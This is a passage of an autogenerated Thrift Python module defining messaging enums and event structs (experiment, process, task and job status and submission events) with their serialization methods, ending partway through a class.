2015-01-22T14:05:24.000Z
|
2022-03-17T12:24:34.000Z
|
#
# Autogenerated by Thrift Compiler (0.10.0)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py
#
from thrift.Thrift import TType, TMessageType, TFrozenDict, TException, TApplicationException
from thrift.protocol.TProtocol import TProtocolException
import sys
import airavata.model.status.ttypes
import airavata.model.application.io.ttypes
import airavata.model.commons.ttypes
from thrift.transport import TTransport
class MessageLevel(object):
INFO = 0
DEBUG = 1
ERROR = 2
ACK = 3
_VALUES_TO_NAMES = {
0: "INFO",
1: "DEBUG",
2: "ERROR",
3: "ACK",
}
_NAMES_TO_VALUES = {
"INFO": 0,
"DEBUG": 1,
"ERROR": 2,
"ACK": 3,
}
class MessageType(object):
EXPERIMENT = 0
EXPERIMENT_CANCEL = 1
TASK = 2
PROCESS = 3
JOB = 4
LAUNCHPROCESS = 5
TERMINATEPROCESS = 6
PROCESSOUTPUT = 7
DB_EVENT = 8
_VALUES_TO_NAMES = {
0: "EXPERIMENT",
1: "EXPERIMENT_CANCEL",
2: "TASK",
3: "PROCESS",
4: "JOB",
5: "LAUNCHPROCESS",
6: "TERMINATEPROCESS",
7: "PROCESSOUTPUT",
8: "DB_EVENT",
}
_NAMES_TO_VALUES = {
"EXPERIMENT": 0,
"EXPERIMENT_CANCEL": 1,
"TASK": 2,
"PROCESS": 3,
"JOB": 4,
"LAUNCHPROCESS": 5,
"TERMINATEPROCESS": 6,
"PROCESSOUTPUT": 7,
"DB_EVENT": 8,
}
class ExperimentStatusChangeEvent(object):
"""
Attributes:
- state
- experimentId
- gatewayId
"""
thrift_spec = (
None, # 0
(1, TType.I32, 'state', None, None, ), # 1
(2, TType.STRING, 'experimentId', 'UTF8', None, ), # 2
(3, TType.STRING, 'gatewayId', 'UTF8', None, ), # 3
)
def __init__(self, state=None, experimentId=None, gatewayId=None,):
self.state = state
self.experimentId = experimentId
self.gatewayId = gatewayId
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.state = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.experimentId = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRING:
self.gatewayId = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('ExperimentStatusChangeEvent')
if self.state is not None:
oprot.writeFieldBegin('state', TType.I32, 1)
oprot.writeI32(self.state)
oprot.writeFieldEnd()
if self.experimentId is not None:
oprot.writeFieldBegin('experimentId', TType.STRING, 2)
oprot.writeString(self.experimentId.encode('utf-8') if sys.version_info[0] == 2 else self.experimentId)
oprot.writeFieldEnd()
if self.gatewayId is not None:
oprot.writeFieldBegin('gatewayId', TType.STRING, 3)
oprot.writeString(self.gatewayId.encode('utf-8') if sys.version_info[0] == 2 else self.gatewayId)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.state is None:
raise TProtocolException(message='Required field state is unset!')
if self.experimentId is None:
raise TProtocolException(message='Required field experimentId is unset!')
if self.gatewayId is None:
raise TProtocolException(message='Required field gatewayId is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class ProcessIdentifier(object):
"""
Attributes:
- processId
- experimentId
- gatewayId
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'processId', 'UTF8', None, ), # 1
(2, TType.STRING, 'experimentId', 'UTF8', None, ), # 2
(3, TType.STRING, 'gatewayId', 'UTF8', None, ), # 3
)
def __init__(self, processId=None, experimentId=None, gatewayId=None,):
self.processId = processId
self.experimentId = experimentId
self.gatewayId = gatewayId
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.processId = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.experimentId = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRING:
self.gatewayId = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('ProcessIdentifier')
if self.processId is not None:
oprot.writeFieldBegin('processId', TType.STRING, 1)
oprot.writeString(self.processId.encode('utf-8') if sys.version_info[0] == 2 else self.processId)
oprot.writeFieldEnd()
if self.experimentId is not None:
oprot.writeFieldBegin('experimentId', TType.STRING, 2)
oprot.writeString(self.experimentId.encode('utf-8') if sys.version_info[0] == 2 else self.experimentId)
oprot.writeFieldEnd()
if self.gatewayId is not None:
oprot.writeFieldBegin('gatewayId', TType.STRING, 3)
oprot.writeString(self.gatewayId.encode('utf-8') if sys.version_info[0] == 2 else self.gatewayId)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.processId is None:
raise TProtocolException(message='Required field processId is unset!')
if self.experimentId is None:
raise TProtocolException(message='Required field experimentId is unset!')
if self.gatewayId is None:
raise TProtocolException(message='Required field gatewayId is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TaskIdentifier(object):
"""
Attributes:
- taskId
- processId
- experimentId
- gatewayId
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'taskId', 'UTF8', None, ), # 1
(2, TType.STRING, 'processId', 'UTF8', None, ), # 2
(3, TType.STRING, 'experimentId', 'UTF8', None, ), # 3
(4, TType.STRING, 'gatewayId', 'UTF8', None, ), # 4
)
def __init__(self, taskId=None, processId=None, experimentId=None, gatewayId=None,):
self.taskId = taskId
self.processId = processId
self.experimentId = experimentId
self.gatewayId = gatewayId
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.taskId = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.processId = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRING:
self.experimentId = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.STRING:
self.gatewayId = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TaskIdentifier')
if self.taskId is not None:
oprot.writeFieldBegin('taskId', TType.STRING, 1)
oprot.writeString(self.taskId.encode('utf-8') if sys.version_info[0] == 2 else self.taskId)
oprot.writeFieldEnd()
if self.processId is not None:
oprot.writeFieldBegin('processId', TType.STRING, 2)
oprot.writeString(self.processId.encode('utf-8') if sys.version_info[0] == 2 else self.processId)
oprot.writeFieldEnd()
if self.experimentId is not None:
oprot.writeFieldBegin('experimentId', TType.STRING, 3)
oprot.writeString(self.experimentId.encode('utf-8') if sys.version_info[0] == 2 else self.experimentId)
oprot.writeFieldEnd()
if self.gatewayId is not None:
oprot.writeFieldBegin('gatewayId', TType.STRING, 4)
oprot.writeString(self.gatewayId.encode('utf-8') if sys.version_info[0] == 2 else self.gatewayId)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.taskId is None:
raise TProtocolException(message='Required field taskId is unset!')
if self.processId is None:
raise TProtocolException(message='Required field processId is unset!')
if self.experimentId is None:
raise TProtocolException(message='Required field experimentId is unset!')
if self.gatewayId is None:
raise TProtocolException(message='Required field gatewayId is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TaskStatusChangeEvent(object):
"""
Attributes:
- state
- taskIdentity
"""
thrift_spec = (
None, # 0
(1, TType.I32, 'state', None, None, ), # 1
(2, TType.STRUCT, 'taskIdentity', (TaskIdentifier, TaskIdentifier.thrift_spec), None, ), # 2
)
def __init__(self, state=None, taskIdentity=None,):
self.state = state
self.taskIdentity = taskIdentity
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.state = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.taskIdentity = TaskIdentifier()
self.taskIdentity.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TaskStatusChangeEvent')
if self.state is not None:
oprot.writeFieldBegin('state', TType.I32, 1)
oprot.writeI32(self.state)
oprot.writeFieldEnd()
if self.taskIdentity is not None:
oprot.writeFieldBegin('taskIdentity', TType.STRUCT, 2)
self.taskIdentity.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.state is None:
raise TProtocolException(message='Required field state is unset!')
if self.taskIdentity is None:
raise TProtocolException(message='Required field taskIdentity is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TaskStatusChangeRequestEvent(object):
"""
Attributes:
- state
- taskIdentity
"""
thrift_spec = (
None, # 0
(1, TType.I32, 'state', None, None, ), # 1
(2, TType.STRUCT, 'taskIdentity', (TaskIdentifier, TaskIdentifier.thrift_spec), None, ), # 2
)
def __init__(self, state=None, taskIdentity=None,):
self.state = state
self.taskIdentity = taskIdentity
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.state = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.taskIdentity = TaskIdentifier()
self.taskIdentity.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TaskStatusChangeRequestEvent')
if self.state is not None:
oprot.writeFieldBegin('state', TType.I32, 1)
oprot.writeI32(self.state)
oprot.writeFieldEnd()
if self.taskIdentity is not None:
oprot.writeFieldBegin('taskIdentity', TType.STRUCT, 2)
self.taskIdentity.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.state is None:
raise TProtocolException(message='Required field state is unset!')
if self.taskIdentity is None:
raise TProtocolException(message='Required field taskIdentity is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class ProcessStatusChangeEvent(object):
"""
Attributes:
- state
- processIdentity
"""
thrift_spec = (
None, # 0
(1, TType.I32, 'state', None, None, ), # 1
(2, TType.STRUCT, 'processIdentity', (ProcessIdentifier, ProcessIdentifier.thrift_spec), None, ), # 2
)
def __init__(self, state=None, processIdentity=None,):
self.state = state
self.processIdentity = processIdentity
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.state = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.processIdentity = ProcessIdentifier()
self.processIdentity.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('ProcessStatusChangeEvent')
if self.state is not None:
oprot.writeFieldBegin('state', TType.I32, 1)
oprot.writeI32(self.state)
oprot.writeFieldEnd()
if self.processIdentity is not None:
oprot.writeFieldBegin('processIdentity', TType.STRUCT, 2)
self.processIdentity.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.state is None:
raise TProtocolException(message='Required field state is unset!')
if self.processIdentity is None:
raise TProtocolException(message='Required field processIdentity is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class ProcessStatusChangeRequestEvent(object):
"""
Attributes:
- state
- processIdentity
"""
thrift_spec = (
None, # 0
(1, TType.I32, 'state', None, None, ), # 1
(2, TType.STRUCT, 'processIdentity', (ProcessIdentifier, ProcessIdentifier.thrift_spec), None, ), # 2
)
def __init__(self, state=None, processIdentity=None,):
self.state = state
self.processIdentity = processIdentity
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.state = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.processIdentity = ProcessIdentifier()
self.processIdentity.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('ProcessStatusChangeRequestEvent')
if self.state is not None:
oprot.writeFieldBegin('state', TType.I32, 1)
oprot.writeI32(self.state)
oprot.writeFieldEnd()
if self.processIdentity is not None:
oprot.writeFieldBegin('processIdentity', TType.STRUCT, 2)
self.processIdentity.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.state is None:
raise TProtocolException(message='Required field state is unset!')
if self.processIdentity is None:
raise TProtocolException(message='Required field processIdentity is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TaskOutputChangeEvent(object):
"""
Attributes:
- output
- taskIdentity
"""
thrift_spec = (
None, # 0
(1, TType.LIST, 'output', (TType.STRUCT, (airavata.model.application.io.ttypes.OutputDataObjectType, airavata.model.application.io.ttypes.OutputDataObjectType.thrift_spec), False), None, ), # 1
(2, TType.STRUCT, 'taskIdentity', (TaskIdentifier, TaskIdentifier.thrift_spec), None, ), # 2
)
def __init__(self, output=None, taskIdentity=None,):
self.output = output
self.taskIdentity = taskIdentity
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.LIST:
self.output = []
(_etype3, _size0) = iprot.readListBegin()
for _i4 in range(_size0):
_elem5 = airavata.model.application.io.ttypes.OutputDataObjectType()
_elem5.read(iprot)
self.output.append(_elem5)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.taskIdentity = TaskIdentifier()
self.taskIdentity.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TaskOutputChangeEvent')
if self.output is not None:
oprot.writeFieldBegin('output', TType.LIST, 1)
oprot.writeListBegin(TType.STRUCT, len(self.output))
for iter6 in self.output:
iter6.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.taskIdentity is not None:
oprot.writeFieldBegin('taskIdentity', TType.STRUCT, 2)
self.taskIdentity.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.output is None:
raise TProtocolException(message='Required field output is unset!')
if self.taskIdentity is None:
raise TProtocolException(message='Required field taskIdentity is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class JobIdentifier(object):
"""
Attributes:
- jobId
- taskId
- processId
- experimentId
- gatewayId
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'jobId', 'UTF8', None, ), # 1
(2, TType.STRING, 'taskId', 'UTF8', None, ), # 2
(3, TType.STRING, 'processId', 'UTF8', None, ), # 3
(4, TType.STRING, 'experimentId', 'UTF8', None, ), # 4
(5, TType.STRING, 'gatewayId', 'UTF8', None, ), # 5
)
def __init__(self, jobId=None, taskId=None, processId=None, experimentId=None, gatewayId=None,):
self.jobId = jobId
self.taskId = taskId
self.processId = processId
self.experimentId = experimentId
self.gatewayId = gatewayId
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.jobId = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.taskId = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRING:
self.processId = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.STRING:
self.experimentId = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.STRING:
self.gatewayId = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('JobIdentifier')
if self.jobId is not None:
oprot.writeFieldBegin('jobId', TType.STRING, 1)
oprot.writeString(self.jobId.encode('utf-8') if sys.version_info[0] == 2 else self.jobId)
oprot.writeFieldEnd()
if self.taskId is not None:
oprot.writeFieldBegin('taskId', TType.STRING, 2)
oprot.writeString(self.taskId.encode('utf-8') if sys.version_info[0] == 2 else self.taskId)
oprot.writeFieldEnd()
if self.processId is not None:
oprot.writeFieldBegin('processId', TType.STRING, 3)
oprot.writeString(self.processId.encode('utf-8') if sys.version_info[0] == 2 else self.processId)
oprot.writeFieldEnd()
if self.experimentId is not None:
oprot.writeFieldBegin('experimentId', TType.STRING, 4)
oprot.writeString(self.experimentId.encode('utf-8') if sys.version_info[0] == 2 else self.experimentId)
oprot.writeFieldEnd()
if self.gatewayId is not None:
oprot.writeFieldBegin('gatewayId', TType.STRING, 5)
oprot.writeString(self.gatewayId.encode('utf-8') if sys.version_info[0] == 2 else self.gatewayId)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.jobId is None:
raise TProtocolException(message='Required field jobId is unset!')
if self.taskId is None:
raise TProtocolException(message='Required field taskId is unset!')
if self.processId is None:
raise TProtocolException(message='Required field processId is unset!')
if self.experimentId is None:
raise TProtocolException(message='Required field experimentId is unset!')
if self.gatewayId is None:
raise TProtocolException(message='Required field gatewayId is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class ExperimentSubmitEvent(object):
"""
Attributes:
- experimentId
- gatewayId
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'experimentId', 'UTF8', None, ), # 1
(2, TType.STRING, 'gatewayId', 'UTF8', None, ), # 2
)
def __init__(self, experimentId=None, gatewayId=None,):
self.experimentId = experimentId
self.gatewayId = gatewayId
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.experimentId = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.gatewayId = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('ExperimentSubmitEvent')
if self.experimentId is not None:
oprot.writeFieldBegin('experimentId', TType.STRING, 1)
oprot.writeString(self.experimentId.encode('utf-8') if sys.version_info[0] == 2 else self.experimentId)
oprot.writeFieldEnd()
if self.gatewayId is not None:
oprot.writeFieldBegin('gatewayId', TType.STRING, 2)
oprot.writeString(self.gatewayId.encode('utf-8') if sys.version_info[0] == 2 else self.gatewayId)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.experimentId is None:
raise TProtocolException(message='Required field experimentId is unset!')
if self.gatewayId is None:
raise TProtocolException(message='Required field gatewayId is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class ProcessSubmitEvent(object):
"""
Attributes:
- processId
- gatewayId
- experimentId
- tokenId
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'processId', 'UTF8', None, ), # 1
(2, TType.STRING, 'gatewayId', 'UTF8', None, ), # 2
(3, TType.STRING, 'experimentId', 'UTF8', None, ), # 3
(4, TType.STRING, 'tokenId', 'UTF8', None, ), # 4
)
def __init__(self, processId=None, gatewayId=None, experimentId=None, tokenId=None,):
self.processId = processId
self.gatewayId = gatewayId
self.experimentId = experimentId
self.tokenId = tokenId
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.processId = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.gatewayId = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRING:
self.experimentId = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.STRING:
self.tokenId = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('ProcessSubmitEvent')
if self.processId is not None:
oprot.writeFieldBegin('processId', TType.STRING, 1)
oprot.writeString(self.processId.encode('utf-8') if sys.version_info[0] == 2 else self.processId)
oprot.writeFieldEnd()
if self.gatewayId is not None:
oprot.writeFieldBegin('gatewayId', TType.STRING, 2)
oprot.writeString(self.gatewayId.encode('utf-8') if sys.version_info[0] == 2 else self.gatewayId)
oprot.writeFieldEnd()
if self.experimentId is not None:
oprot.writeFieldBegin('experimentId', TType.STRING, 3)
oprot.writeString(self.experimentId.encode('utf-8') if sys.version_info[0] == 2 else self.experimentId)
oprot.writeFieldEnd()
if self.tokenId is not None:
oprot.writeFieldBegin('tokenId', TType.STRING, 4)
oprot.writeString(self.tokenId.encode('utf-8') if sys.version_info[0] == 2 else self.tokenId)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.processId is None:
raise TProtocolException(message='Required field processId is unset!')
if self.gatewayId is None:
raise TProtocolException(message='Required field gatewayId is unset!')
if self.experimentId is None:
raise TProtocolException(message='Required field experimentId is unset!')
if self.tokenId is None:
raise TProtocolException(message='Required field tokenId is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class ProcessTerminateEvent(object):
"""
Attributes:
- processId
- gatewayId
- tokenId
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'processId', 'UTF8', None, ), # 1
(2, TType.STRING, 'gatewayId', 'UTF8', None, ), # 2
(3, TType.STRING, 'tokenId', 'UTF8', None, ), # 3
)
def __init__(self, processId=None, gatewayId=None, tokenId=None,):
self.processId = processId
self.gatewayId = gatewayId
self.tokenId = tokenId
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
